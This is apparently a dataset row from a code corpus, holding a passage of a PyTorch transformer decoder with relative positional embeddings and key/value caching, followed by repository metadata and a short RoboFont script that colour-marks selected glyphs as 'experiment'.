super().__init__()
self.layer_norm_1 = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
self.layer_norm_2 = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
self.pointwise_ff = PointwiseFeedForward(n_embedding, n_state_ffn)
self.self_attention = SelfMaskedAttention(n_embedding=n_embedding,
n_head=n_head,
dropout_attention=dropout_attention,
dropout_residual=dropout_residual,
n_context=n_context,
n_positional_embedding=n_positional_embedding)
def forward(self,
x,
cached_key_value: list = None,
r_position_embedding=None,
r_content_bias=None,
r_position_bias=None):
""" single transformer block
Parameter
------------
x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
cached_key_value: list of two tensors (batch, n_head, dim / n_head, cached_seq), [cached_key, cached_value]
Return
------------
x: tensor (batch, seq, dim)
(k, v): `key` tensor (batch, head, dim/head, seq + cache_size) and
`value` tensor (batch, head, seq + cache_size, dim/head)
"""
c, (k, v) = self.self_attention(self.layer_norm_1(x),
cached_key_value=cached_key_value,
r_position_embedding=r_position_embedding,
r_content_bias=r_content_bias,
r_position_bias=r_position_bias)
output = x + self.pointwise_ff(self.layer_norm_2(x + c))
# print('out', output)
return output, (k, v)
class TransformerDecoder(nn.Module):
""" Transformer Decoder """
def __init__(self,
n_layer: int,
n_embedding: int,
n_state_ffn: int,
n_head: int,
dropout_embedding: float,
dropout_residual: float,
dropout_attention: float,
n_context: int,
n_positional_embedding: int = None):
""" Transformer Decoder
Parameter
------------
n_layer: int
number of layer
n_embedding: int
embedding dimension
n_state_ffn: int
intermediate state dimension
n_head: int
number of attention head
dropout_residual: float
dropout_attention: float
max_cache_size: int
max cache size for key/value
n_positional_embedding: int
relative positional embedding dimension (no relative position encoding if None)
"""
super().__init__()
self.transformer_stack = nn.ModuleList([
TransformerBlock(n_embedding=n_embedding,
n_state_ffn=n_state_ffn,
n_head=n_head,
dropout_residual=dropout_residual,
dropout_attention=dropout_attention,
n_context=n_context,
n_positional_embedding=n_positional_embedding)
for _ in range(n_layer)
])
self.input_dropout = nn.Dropout(dropout_embedding)
self.layer_norm = nn.LayerNorm(n_embedding, eps=EPS_LAYER_NORM)
assert n_embedding % n_head == 0
if n_positional_embedding and n_positional_embedding != 0:
self.pos_emb = PositionalEmbedding(n_positional_embedding)
self.r_c_bias = nn.Parameter(torch.zeros((n_head, int(n_embedding / n_head))))
self.r_p_bias = nn.Parameter(torch.zeros((n_head, int(n_embedding / n_head))))
else:
self.r_c_bias = self.r_p_bias = self.pos_emb = None
self.n_layer = n_layer
self.n_context = n_context
def forward(self, x, cached_key_value: list=None, max_cache_length: int=None):
""" transformer decoder output
Parameter
------------
x: tensor (batch, seq, dim), where the last row x[:, seq, :] is the newest token
cached_key_value: cached key/value tensor
Return
------------
x: tensor (batch, seq, dim)
cached_key_value_new: new cached_key_value
"""
cached_length = cached_key_value[0][0].size(-1) if cached_key_value is not None else 0
max_cache_length = min(cached_length, max_cache_length) if max_cache_length else cached_length
if self.pos_emb:
pos_seq = torch.arange(self.n_context + max_cache_length, device=x.device, dtype=x.dtype)
pos_emb = self.pos_emb(pos_seq) # (1, seq + cached - 1, dim)
pos_emb = self.input_dropout(pos_emb)
else:
assert cached_length == 0
pos_emb = None
if cached_length == 0:
cached_key_value = [None] * self.n_layer
assert len(cached_key_value) == self.n_layer
x = self.input_dropout(x)
cached_key_value_new = []
for transformer_block, cached_kv in zip(self.transformer_stack, cached_key_value):
# limit cached context length
if cached_kv is not None and max_cache_length < cached_length:
k, v = cached_kv
cached_kv = (k[:, :, :, -max_cache_length:].detach(), v[:, :, -max_cache_length:, :].detach())
x, (k, v) = transformer_block(x,
cached_key_value=cached_kv,
r_position_embedding=pos_emb,
r_content_bias=self.r_c_bias,
r_position_bias=self.r_p_bias)
cached_key_value_new.append((k, v))
x = self.layer_norm(x)
return x, cached_key_value_new
|
[
"spacefunkspacefunk@gmail.com"
] |
spacefunkspacefunk@gmail.com
|
59a531064d975b14af155d2f190f2f7872331b7a
|
05f5231a03e19b3bf72fa1caf939ea952aee36c4
|
/03--experiment.py
|
2552d26e9df07a803cbabfc4de8d812c63ed7516
|
[
"MIT"
] |
permissive
|
thundernixon/robofont-marx
|
673f426ccafb521d94bbc7d7e5adaa92d6c6fec3
|
ee8b6444c486b730f58f9b139f1143e3d04a35e6
|
refs/heads/master
| 2022-01-15T05:56:00.093046
| 2019-07-17T16:26:07
| 2019-07-17T16:26:07
| 195,687,796
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 318
|
py
|
# menuTitle : 03: Experiment - Purple
# shortCut : command+control+shift+3
"""
Mark currently-selected glyphs as "worked on,"
so it's clear they have been edited.
"""
from markLib.markGlyphs import markGlyphs
from markLib.settings import markSettings
f = CurrentFont()
markGlyphs(f, markSettings["experiment"])
|
[
"stephen@thundernixon.com"
] |
stephen@thundernixon.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.